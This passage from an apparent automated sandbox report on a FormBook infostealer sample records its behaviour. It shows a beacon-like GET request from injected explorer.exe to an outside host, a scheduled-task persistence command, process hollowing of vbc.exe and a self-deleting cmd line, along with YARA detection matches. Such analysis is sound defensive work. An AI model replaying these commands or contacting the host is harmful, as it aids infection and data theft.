65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                              Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              9192.168.2.349756103.20.127.6180C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jan 13, 2021 20:54:33.266032934 CET4215OUTGET /csv8/?EZUXxJ=JcDbJrKBTdSh2qrV/QHXhZH9/vCGpAjnUxGYv0DqxJ8xNpceyS+NtrlgJ2Ns4M+VWFGw&DzrLH=VBZHYDrxndGXyf HTTP/1.1
                                                                              Host: www.starrockindia.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Jan 13, 2021 20:54:33.497687101 CET4216INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Wed, 13 Jan 2021 19:54:33 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Content-Length: 110148
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              X-Powered-By: Express
                                                                              Cache-Control: no-cache, no-store, must-revalidate, no-transform
                                                                              Pragma: no-cache
                                                                              Expires: 0
                                                                              Set-Cookie: isOffersHeaderHidden=; Domain=.www.starrockindia.com; Path=/; Expires=Thu, 01 Jan 1970 00:00:00 GMT
                                                                              Set-Cookie: webtype=undefined; Max-Age=1610567759; Domain=.www.starrockindia.com; Path=/; Expires=Wed, 27 Jan 2072 15:50:33 GMT
                                                                              Set-Cookie: googtrans=/en/en; Max-Age=31536; Domain=.www.starrockindia.com; Path=/; Expires=Thu, 14 Jan 2021 04:40:09 GMT
                                                                              Set-Cookie: googtrans=/en/en; Max-Age=31536; Domain=www.starrockindia.com; Path=/; Expires=Thu, 14 Jan 2021 04:40:09 GMT
                                                                              Set-Cookie: googtrans=/en/en; Max-Age=31536; Domain=.starrockindia.com; Path=/; Expires=Thu, 14 Jan 2021 04:40:09 GMT
                                                                              Set-Cookie: NSSESSION=s%3Ab_laNRemp_OZhkT7Qr2HMMbN9wjixjYo.J4WPflv34Peqk3ogoUuP17Qv1dOM0J12KrGv4kCtRpQ; Path=/; Expires=Thu, 13 Jan 2022 19:54:33 GMT; HttpOnly
                                                                              ETag: W/"1ae44-uQHKo3LIvspdKsaZSKnyGY4Un7s"
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 64 65 73 6b 74 6f 70 20 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 59 59 33 4f 67 75 55 6e 7a 4b 6e 77 43 72 56 44 32 39 45 31 71 66 4a 6f 6d 50 46 37 5f 70 46 52 51 66 44 55 6d 70 5a 2d 36 42 77 22 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 3c 6d
                                                                              Data Ascii: <!DOCTYPE html><html class="no-js desktop " lang="en"><head><meta name="google-site-verification" content="YY3OguUnzKnwCrVD29E1qfJomPF7_pFRQfDUmpZ-6Bw"/><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><m


                                                                              Code Manipulations

                                                                              Statistics

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Start time:20:52:33
                                                                              Start date:13/01/2021
                                                                              Path:C:\Users\user\Desktop\JAAkR51fQY.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\JAAkR51fQY.exe'
                                                                              Imagebase:0x6d0000
                                                                              File size:1068544 bytes
                                                                              MD5 hash:1DD3DDA596F5391BB865683FA49B531E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.228381920.0000000002A91000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.230538128.000000000446C000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.230538128.000000000446C000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.230538128.000000000446C000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:low

                                                                              General

                                                                              Start time:20:52:43
                                                                              Start date:13/01/2021
                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zLIpEDZOH' /XML 'C:\Users\user\AppData\Local\Temp\tmp8416.tmp'
                                                                              Imagebase:0x8c0000
                                                                              File size:185856 bytes
                                                                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:20:52:43
                                                                              Start date:13/01/2021
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6b2800000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:20:52:44
                                                                              Start date:13/01/2021
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:{path}
                                                                              Imagebase:0xc90000
                                                                              File size:2688096 bytes
                                                                              MD5 hash:B3A917344F5610BEEC562556F11300FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate

                                                                              General

                                                                              Start time:20:52:45
                                                                              Start date:13/01/2021
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:{path}
                                                                              Imagebase:0xc90000
                                                                              File size:2688096 bytes
                                                                              MD5 hash:B3A917344F5610BEEC562556F11300FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.268975653.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.268975653.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.268975653.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.269629188.0000000005610000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.269629188.0000000005610000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.269629188.0000000005610000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.269603953.00000000055E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.269603953.00000000055E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.269603953.00000000055E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:moderate

                                                                              General

                                                                              Start time:20:52:47
                                                                              Start date:13/01/2021
                                                                              Path:C:\Windows\explorer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:
                                                                              Imagebase:0x7ff714890000
                                                                              File size:3933184 bytes
                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:20:53:02
                                                                              Start date:13/01/2021
                                                                              Path:C:\Windows\SysWOW64\wlanext.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                                              Imagebase:0xac0000
                                                                              File size:78848 bytes
                                                                              MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.585911893.0000000000A90000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.585911893.0000000000A90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.585911893.0000000000A90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.587186497.0000000002BE0000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.587186497.0000000002BE0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.587186497.0000000002BE0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.583664848.0000000000700000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.583664848.0000000000700000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.583664848.0000000000700000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:moderate

                                                                              General

                                                                              Start time:20:53:06
                                                                              Start date:13/01/2021
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'
                                                                              Imagebase:0xb0000
                                                                              File size:232960 bytes
                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:20:53:07
                                                                              Start date:13/01/2021
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6b2800000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Disassembly

                                                                              Code Analysis

                                                                              Reset < >